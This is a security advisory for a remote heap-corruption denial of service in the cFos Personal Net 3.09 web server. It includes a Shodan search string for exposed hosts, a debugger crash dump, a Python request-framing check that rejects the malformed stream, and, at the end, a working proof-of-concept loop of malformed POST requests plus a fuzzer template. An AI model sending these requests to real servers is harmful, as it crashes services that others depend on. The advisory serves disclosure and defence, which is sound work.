cFos Personal Net v3.09 Remote Heap Memory Corruption Denial of Service
Vendor: cFos Software GmbH
Product web page: https://www.cfos.de
Affected version: 3.09
Summary: cFos Personal Net (PNet) is a full-featured HTTP server intended for
personal and professional use. For personal use, instead of hosting websites
with a web hoster, you simply run it on your Windows machine. For professional
use, you rent a virtual Windows PC or a dedicated PC from a web hoster and run
it there.
Desc: The cFos Personal Net web server is vulnerable to a remote denial of
service when it receives multiple malformed POST requests within 3000 ms.
The issue occurs because the application fails to handle the data sent in
those POST requests over a single socket connection, causing heap memory
corruption that crashes the HTTP service.
SHODAN: cFos Personal Net v3.09 Microsoft-HTTPAPI/2.0
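To show the framing check a server needs here, an added example (not code from the advisory or the vendor): a strict HTTP/1.1 request framer that consumes exactly Content-Length body bytes per request and closes the connection when leftover bytes of a pipelined request do not form a valid request line, instead of carrying them into the next request. MAX_BODY is an assumed policy limit, and the two-request byte stream is constructed from the PoC headers in this advisory.

```python
import re
from typing import Dict, List, Optional, Tuple

MAX_BODY = 1 << 20  # assumed policy cap; the advisory gives no figure
REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")

def parse_one(buf: bytes) -> Tuple[Optional[Dict], bytes, str]:
    """Frame one request: exactly Content-Length body bytes, no more, no less.
    Returns (request or None, unconsumed bytes, status)."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return None, buf, "incomplete"
    lines = buf[:end].split(b"\r\n")
    if not REQUEST_LINE.match(lines[0]):
        # Stray body bytes from the previous request land here: close, don't guess.
        return None, b"", "reject: malformed request line"
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            return None, b"", "reject: malformed header"
        headers[name.strip().lower()] = value.strip()
    clen_raw = headers.get(b"content-length", b"0")
    if not clen_raw.isdigit():
        return None, b"", "reject: non-numeric Content-Length"
    clen = int(clen_raw)
    if clen > MAX_BODY:
        return None, b"", "reject: Content-Length exceeds limit"
    rest = buf[end + 4:]
    if len(rest) < clen:
        return None, buf, "incomplete"  # wait for the rest of the body
    return {"line": lines[0], "headers": headers, "body": rest[:clen]}, rest[clen:], "ok"

def drain(stream: bytes) -> Tuple[List[Dict], str]:
    """Parse pipelined requests from one connection; stop at the first reject."""
    reqs: List[Dict] = []
    while stream:
        req, stream, status = parse_one(stream)
        if req is None:
            return reqs, status
        reqs.append(req)
    return reqs, "ok"

# Constructed stream mirroring the PoC: Content-Length claims 20 bytes, but each
# body is 18 'A's plus CRLF CRLF (22 bytes), and two such requests share a socket.
ONE_POST = (b"POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n"
            b"Host: 192.168.0.107\r\n"
            b"Content-Length: 20\r\n\r\n" + b"A" * 18 + b"\r\n\r\n")
PIPELINED = ONE_POST * 2

if __name__ == "__main__":
    parsed, status = drain(PIPELINED)
    print(len(parsed), "request(s) accepted;", status)
```

The first request parses cleanly; the two surplus body bytes then sit where the second request line should start, so the framer rejects and the connection is closed rather than parsed with corrupted state.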
============================================================================
(658.1448): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for cfospnet.exe
eax=feeefeee ebx=02813dcc ecx=02813dcc edx=00000000 esi=028198b0 edi=02813c88
eip=00914529 esp=03b1fb94 ebp=03b1fbb8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
cfospnet+0x54529:
00914529 ff5004          call    dword ptr [eax+4]    ds:002b:feeefef2=????????
0:024> d ecx
02813dcc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813ddc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dec  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813dfc  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e0c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e1c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e2c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
02813e3c  ee fe ee fe ee fe ee fe-ee fe ee fe ee fe ee fe  ................
0:024> d esi
028198b0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198c0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198d0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198e0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
028198f0  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819900  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819910  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
02819920  0d f0 ad ba 0d f0 ad ba-0d f0 ad ba 0d f0 ad ba  ................
============================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5184
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5184.php
01.04.2014
---
-ALGjlang
open_socket();
for (j = 1; j <= 30; j++)
{
    send_socket("
POST /scripts/get_server_stats.jss?name= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*
Host: 192.168.0.107
Content-Length: 20

AAAAAAAAAAAAAAAAAA\x0d\x0a\x0d\x0a
");
}
close_socket();
-SPKfzz
s_string("POST /scripts/get_server_stats.jss?name= HTTP/1.1\r\n");
s_string("User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\r\n");
s_string("Accept: */*\r\n");
s_string("Host: 192.168.0.107\r\n");
s_string("Content-Length: ");
s_blocksize_string("fuzz",15);
s_string("\r\n\r\n");
s_block_start("fuzz");
s_string("joxypoxyjoxypoxy!!\r\n\" * 100);
s_string_variable("ZSL");
s_string("\r\n"); // important
s_block_end("fuzz");